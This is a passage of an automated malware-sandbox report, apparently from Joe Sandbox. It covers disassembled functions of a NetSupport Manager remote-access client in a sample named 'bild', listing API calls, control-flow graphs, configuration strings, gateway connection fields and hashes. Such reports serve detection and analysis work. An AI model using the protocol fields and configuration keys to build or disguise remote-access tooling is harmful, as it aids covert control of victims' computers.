                                                                                            • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                            • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                            • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                            • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102E9C1
                                                                                          • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102E9E9
                                                                                          • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102ECAB
                                                                                            • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B4C
                                                                                            • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B59
                                                                                            • Part of subcall function 11094B30: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B89
                                                                                          • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EA48
                                                                                          • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EA54
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 1102EA6C
                                                                                          • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EA79
                                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EA9B
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E7F6
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          • LoadIconA.USER32(11000000,000004C1), ref: 1102EE45
                                                                                          • LoadIconA.USER32(11000000,000004C2), ref: 1102EE55
                                                                                          • DestroyCursor.USER32(00000000), ref: 1102EE7E
                                                                                          • DestroyCursor.USER32(00000000), ref: 1102EE92
                                                                                          • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F45F
                                                                                          • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F4B2
                                                                                          • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 1102FA52
                                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FA8C
                                                                                            • Part of subcall function 11132BF0: wsprintfA.USER32 ref: 11132C60
                                                                                            • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132C91
                                                                                            • Part of subcall function 11132BF0: SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                            • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132CAC
                                                                                            • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                          • DispatchMessageA.USER32(?), ref: 1102FA96
                                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FAA8
                                                                                          • CloseHandle.KERNEL32(00000000,11027270,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102FD40
                                                                                          • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102FD78
                                                                                          • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 1102FD7F
                                                                                          • SetWindowPos.USER32(000404A0,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102FDB5
                                                                                          • CloseHandle.KERNEL32(00000000,11059C10,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102FE36
                                                                                          • wsprintfA.USER32 ref: 1102FFA5
                                                                                          • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 110300F7
                                                                                          • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103010D
                                                                                          • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 11030136
                                                                                          • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103015F
                                                                                            • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,F3EE1E80,00000002,75922EE0), ref: 1112820A
                                                                                            • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11128217
                                                                                            • Part of subcall function 111281B0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000), ref: 1112825E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Message$Process$Window$CloseCreateEventHandlePostwsprintf$CriticalOpenSectionThread$CountCurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTickTokenVersionWait$ClassDispatchEnterErrorExitFolderLastMetricsPathPrioritySendSleepSystem__wcstoi64_malloc_memset
                                                                                          • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$506407$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.8$V12.10.8$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                          • API String ID: 1099283604-2778481161
                                                                                          • Opcode ID: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                          • Instruction ID: 27af1d42f1b4f6ddb2c14770db7fbacfca67435089f052a3aa779117de4136e9
                                                                                          • Opcode Fuzzy Hash: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                          • Instruction Fuzzy Hash: 3CE25D75F0022AABEF15DBE4DC80FADF7A5AB4474CF904068E925AB3C4D770A944CB52

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1127 1102db00-1102db50 call 1110f420 1130 1102db52-1102db66 call 11142a60 1127->1130 1131 1102db68 1127->1131 1133 1102db6e-1102dbb3 call 11142290 call 11142ac0 1130->1133 1131->1133 1139 1102dd53-1102dd62 call 11144dc0 1133->1139 1140 1102dbb9 1133->1140 1148 1102dd68-1102dd78 1139->1148 1142 1102dbc0-1102dbc3 1140->1142 1144 1102dbc5-1102dbc7 1142->1144 1145 1102dbe8-1102dbf1 1142->1145 1149 1102dbd0-1102dbe1 1144->1149 1146 1102dbf7-1102dbfe 1145->1146 1147 1102dd24-1102dd3d call 11142ac0 1145->1147 1146->1147 1151 1102dcf3-1102dd08 call 11162de7 1146->1151 1152 1102dc05-1102dc07 1146->1152 1153 1102dd0a-1102dd1f call 11162de7 1146->1153 1154 1102dc9a-1102dccd call 111618c1 call 11142290 1146->1154 1155 1102dcdb-1102dcf1 call 11164010 1146->1155 1156 1102dc8b-1102dc95 1146->1156 1157 1102dccf-1102dcd9 1146->1157 1158 1102dc4c-1102dc52 1146->1158 1159 1102dc7c-1102dc86 1146->1159 1147->1142 1175 1102dd43-1102dd45 1147->1175 1161 1102dd7a 1148->1161 1162 1102dd7f-1102dd93 call 1102cc10 1148->1162 1149->1149 1150 1102dbe3 1149->1150 1150->1147 1151->1147 1152->1147 1167 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 1152->1167 1153->1147 1154->1147 1155->1147 1156->1147 1157->1147 1169 1102dc54-1102dc68 call 11162de7 1158->1169 1170 1102dc6d-1102dc77 1158->1170 1159->1147 1161->1162 1179 1102dd98-1102dd9d 1162->1179 1167->1147 1169->1147 1170->1147 1180 1102de43-1102de5d call 111463d0 1175->1180 1184 1102dd4b-1102dd51 1175->1184 1179->1180 1181 1102dda3-1102ddc8 call 110b7920 call 11146450 1179->1181 1194 1102deb3-1102debf call 1102b4f0 1180->1194 1195 1102de5f-1102de78 call 1105dd10 1180->1195 1202 1102ddd3-1102ddd9 1181->1202 1203 1102ddca-1102ddd1 1181->1203 1184->1139 1184->1148 1206 1102dec1-1102dec8 1194->1206 1207 1102de98-1102de9f 1194->1207 1195->1194 1210 1102de7a-1102de8c 1195->1210 1208 1102dddb-1102dde2 call 11027d60 1202->1208 1209 1102de39 1202->1209 1203->1180 1211 1102dea5-1102dea8 1206->1211 1212 1102deca-1102ded4 1206->1212 1207->1211 1214 1102e0aa-1102e0cb GetComputerNameA 1207->1214 1208->1209 1225 1102dde4-1102de16 1208->1225 1209->1180 1210->1194 1226 1102de8e 1210->1226 1215 1102deaa-1102deb1 call 110b7920 1211->1215 1216 1102ded9 1211->1216 1212->1214 1218 1102e103-1102e109 1214->1218 1219 1102e0cd-1102e101 call 11027c30 1214->1219 1224 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 1215->1224 1216->1224 1222 1102e10b-1102e110 1218->1222 1223 1102e13f-1102e152 call 11164010 1218->1223 1219->1218 1246 1102e157-1102e163 1219->1246 1230 1102e116-1102e11a 1222->1230 1245 1102e347-1102e36a 1223->1245 1277 1102e07a-1102e082 SetLastError 1224->1277 1278 1102dfbc-1102dfd3 1224->1278 1239 1102de20-1102de2f call 110f6080 1225->1239 1240 1102de18-1102de1e 1225->1240 1226->1207 1232 1102e136-1102e138 1230->1232 1233 1102e11c-1102e11e 1230->1233 1244 1102e13b-1102e13d 1232->1244 1242 1102e132-1102e134 1233->1242 1243 1102e120-1102e126 1233->1243 1249 1102de32-1102de34 call 1102d330 1239->1249 1240->1239 1240->1249 1242->1244 1243->1232 1247 1102e128-1102e130 1243->1247 1244->1223 1244->1246 1258 1102e392-1102e39a 1245->1258 1259 1102e36c-1102e372 1245->1259 1255 1102e165-1102e17a call 110b7920 call 11029bd0 1246->1255 1256 1102e17c-1102e18f call 11081a70 1246->1256 1247->1230 1247->1242 1249->1209 1282 1102e1d3-1102e1ec call 11081a70 1255->1282 1271 1102e191-1102e1b4 1256->1271 1272 1102e1b6-1102e1b8 1256->1272 1266 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 1258->1266 1267 1102e39c-1102e3a9 call 11035dd0 call 111618c1 1258->1267 1259->1258 1265 1102e374-1102e38d call 1102d330 1259->1265 1265->1258 1267->1266 1271->1282 1276 1102e1c0-1102e1d1 1272->1276 1276->1276 1276->1282 1284 1102e043-1102e04f 1277->1284 1278->1284 1295 1102dfd5-1102dfde 1278->1295 1302 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 1282->1302 1303 1102e32c-1102e339 call 11164010 1282->1303 1287 1102e092-1102e0a1 1284->1287 1288 1102e051-1102e05d 1284->1288 1287->1214 1297 1102e0a3-1102e0a4 FreeLibrary 1287->1297 1293 1102e06f-1102e073 1288->1293 1294 1102e05f-1102e06d GetProcAddress 1288->1294 1299 1102e084-1102e086 SetLastError 1293->1299 1300 1102e075-1102e078 1293->1300 1294->1293 1295->1284 1304 1102dfe0-1102e016 call 11146450 call 1112b270 1295->1304 1297->1214 1307 1102e08c 1299->1307 1300->1307 1339 1102e283-1102e299 call 11128ec0 1302->1339 1340 1102e26f-1102e27e call 11029450 1302->1340 1316 1102e33c-1102e341 CharUpperA 1303->1316 1304->1284 1323 1102e018-1102e03e call 11146450 call 11027920 1304->1323 1307->1287 1316->1245 1323->1284 1344 1102e2b2-1102e2ec call 110d0bd0 * 2 1339->1344 1345 1102e29b-1102e2ad call 110d0bd0 1339->1345 1340->1339 1352 1102e302-1102e32a call 11164010 call 110d07c0 1344->1352 1353 1102e2ee-1102e2fd call 11029450 1344->1353 1345->1344 1352->1316 1353->1352
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _malloc_memsetwsprintf
                                                                                          • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$14/03/16 10:38:31 V12.10F8$506407$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                          • API String ID: 3802068140-2718682828
                                                                                          • Opcode ID: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                          • Instruction ID: 727bed6a5d63171c4319a8bac454151215a042d106ed124055d9f0508de139ba
                                                                                          • Opcode Fuzzy Hash: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                          • Instruction Fuzzy Hash: 7932D275D0022A9FDF12DFA4DC84BEDB7B8AB44308F9445E9E55867280EB70AF84CB51

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1779 6c5e3d00-6c5e3d42 call 6c5f1c50 call 6c5e3b80 1783 6c5e3d47-6c5e3d4f 1779->1783 1784 6c5e3d6c-6c5e3d6e 1783->1784 1785 6c5e3d51-6c5e3d6b call 6c5f28e1 1783->1785 1787 6c5e3d87-6c5e3da1 call 6c5d8fb0 1784->1787 1788 6c5e3d70-6c5e3d84 call 6c5d6f50 1784->1788 1794 6c5e3dc5-6c5e3e44 call 6c5d5e90 * 2 call 6c5e7be0 call 6c5d5e20 lstrlenA 1787->1794 1795 6c5e3da3-6c5e3dc4 call 6c5d63c0 call 6c5f28e1 1787->1795 1788->1787 1808 6c5e3e98-6c5e3fbe call 6c5d5500 call 6c5d6050 call 6c5e7c70 * 2 call 6c5e7d00 * 3 call 6c5d5060 call 6c5e7d00 call 6c5f1bfd call 6c5e7d00 gethostname call 6c5e7d00 call 6c5db8e0 1794->1808 1809 6c5e3e46-6c5e3e95 call 6c5ed8b0 call 6c5d5060 call 6c5d4830 call 6c5f1bfd 1794->1809 1844 6c5e3fc5-6c5e3fe1 call 6c5e7d00 1808->1844 1845 6c5e3fc0 1808->1845 1809->1808 1848 6c5e3ff8-6c5e3ffe 1844->1848 1849 6c5e3fe3-6c5e3ff5 call 6c5e7d00 1844->1849 1845->1844 1851 6c5e421a-6c5e4263 call 6c5e7b60 call 6c5f1bfd call 6c5d98d0 call 6c5e77e0 1848->1851 1852 6c5e4004-6c5e4022 call 6c5d5e20 1848->1852 1849->1848 1880 6c5e4265-6c5e4291 call 6c5da4e0 call 6c5f28e1 1851->1880 1881 6c5e4292-6c5e42aa call 6c5f28e1 1851->1881 1858 6c5e405a-6c5e4084 call 6c5d5e20 1852->1858 1859 6c5e4024-6c5e4057 call 6c5d5060 call 6c5e7d00 call 6c5f1bfd 1852->1859 1869 6c5e408a-6c5e41ce call 6c5d5060 call 6c5e7d00 call 6c5f1bfd call 6c5d5e20 call 6c5d5060 call 6c5e7d00 call 6c5f1bfd call 6c5d5e20 call 6c5d5060 call 6c5e7d00 call 6c5f1bfd call 6c5d5e20 call 6c5d5060 call 6c5e7d00 call 6c5f1bfd 1858->1869 1870 6c5e41d1-6c5e4217 call 6c5e7d00 call 6c5d5e20 call 6c5e7d00 1858->1870 1859->1858 1869->1870 1870->1851
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _memset
                                                                                          • String ID: *Dept$*Gsk$1.1$506407$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                          • API String ID: 2102423945-309379103
                                                                                          • Opcode ID: 6d435d229b3b4486908d5cddf25466578f610b9cc7e2ac30755706ff97e1e4e5
                                                                                          • Instruction ID: 78ceed8447a9ae39e8a9817248ff21eb9eee86c501455ac377cf3cee1fdc15f7
                                                                                          • Opcode Fuzzy Hash: 6d435d229b3b4486908d5cddf25466578f610b9cc7e2ac30755706ff97e1e4e5
                                                                                          • Instruction Fuzzy Hash: D0E1A7B2D0021CAACB24DB68DC81FEF7779DF99206F4045D5E50963A41DB30AF888FA5

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2020 110a9c90-110a9cf2 LoadLibraryA GetProcAddress 2021 110a9cf8-110a9d09 SetupDiGetClassDevsA 2020->2021 2022 110a9e05-110a9e0d SetLastError 2020->2022 2023 110a9d0f-110a9d1d 2021->2023 2024 110a9f13-110a9f15 2021->2024 2027 110a9e19-110a9e1b SetLastError 2022->2027 2028 110a9d20-110a9d24 2023->2028 2025 110a9f1e-110a9f20 2024->2025 2026 110a9f17-110a9f18 FreeLibrary 2024->2026 2029 110a9f37-110a9f52 call 11161d01 2025->2029 2026->2025 2030 110a9e21-110a9e2c GetLastError 2027->2030 2031 110a9d3d-110a9d55 2028->2031 2032 110a9d26-110a9d37 GetProcAddress 2028->2032 2033 110a9e32-110a9e3d call 11162be5 2030->2033 2034 110a9ec0-110a9ed1 GetProcAddress 2030->2034 2031->2030 2041 110a9d5b-110a9d5d 2031->2041 2032->2027 2032->2031 2033->2028 2038 110a9edb-110a9edd SetLastError 2034->2038 2039 110a9ed3-110a9ed9 SetupDiDestroyDeviceInfoList 2034->2039 2043 110a9ee3-110a9ee5 2038->2043 2039->2043 2045 110a9d68-110a9d6a 2041->2045 2046 110a9d5f-110a9d65 call 11162be5 2041->2046 2043->2024 2044 110a9ee7-110a9f09 CreateFileA 2043->2044 2047 110a9f0b-110a9f10 call 11162be5 2044->2047 2048 110a9f22-110a9f2c call 11162be5 2044->2048 2050 110a9d6c-110a9d7f GetProcAddress 2045->2050 2051 110a9d85-110a9d9b 2045->2051 2046->2045 2047->2024 2060 110a9f2e-110a9f2f FreeLibrary 2048->2060 2061 110a9f35 2048->2061 2050->2051 2054 110a9e42-110a9e4a SetLastError 2050->2054 2059 110a9d9d-110a9da6 GetLastError 2051->2059 2062 110a9dac-110a9dbf call 11162b51 2051->2062 2054->2059 2059->2062 2063 110a9e81-110a9e92 call 110a9c30 2059->2063 2060->2061 2061->2029 2070 110a9ea2-110a9eb3 call 110a9c30 2062->2070 2071 110a9dc5-110a9dcd 2062->2071 2068 110a9e9b-110a9e9d 2063->2068 2069 110a9e94-110a9e95 FreeLibrary 2063->2069 2068->2029 2069->2068 2070->2068 2078 110a9eb5-110a9ebe FreeLibrary 2070->2078 2073 110a9dcf-110a9de2 GetProcAddress 2071->2073 2074 110a9de4-110a9dfb 2071->2074 2073->2074 2075 110a9e4f-110a9e51 SetLastError 2073->2075 2079 110a9e57-110a9e71 call 110a9c30 call 11162be5 2074->2079 2080 110a9dfd-110a9e00 2074->2080 2075->2079 2078->2029 2079->2068 2085 110a9e73-110a9e7c FreeLibrary 2079->2085 2080->2028 2085->2029
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(setupapi.dll,F3EE1E80,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11184778), ref: 110A9CC3
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A9CE7
                                                                                          • SetupDiGetClassDevsA.SETUPAPI(111A6E0C,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF), ref: 110A9D01
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A9D2C
                                                                                          • _free.LIBCMT ref: 110A9D60
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9D72
                                                                                          • GetLastError.KERNEL32 ref: 110A9D9D
                                                                                          • _malloc.LIBCMT ref: 110A9DB3
                                                                                          • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9DD5
                                                                                          • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9E07
                                                                                          • SetLastError.KERNEL32(00000078), ref: 110A9E1B
                                                                                          • GetLastError.KERNEL32 ref: 110A9E21
                                                                                          • _free.LIBCMT ref: 110A9E33
                                                                                          • SetLastError.KERNEL32(00000078), ref: 110A9E44
                                                                                          • SetLastError.KERNEL32(00000078), ref: 110A9E51
                                                                                          • _free.LIBCMT ref: 110A9E64
                                                                                          • FreeLibrary.KERNEL32(?,?), ref: 110A9E74
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9F18
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                          • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                          • API String ID: 3464732724-3340099623
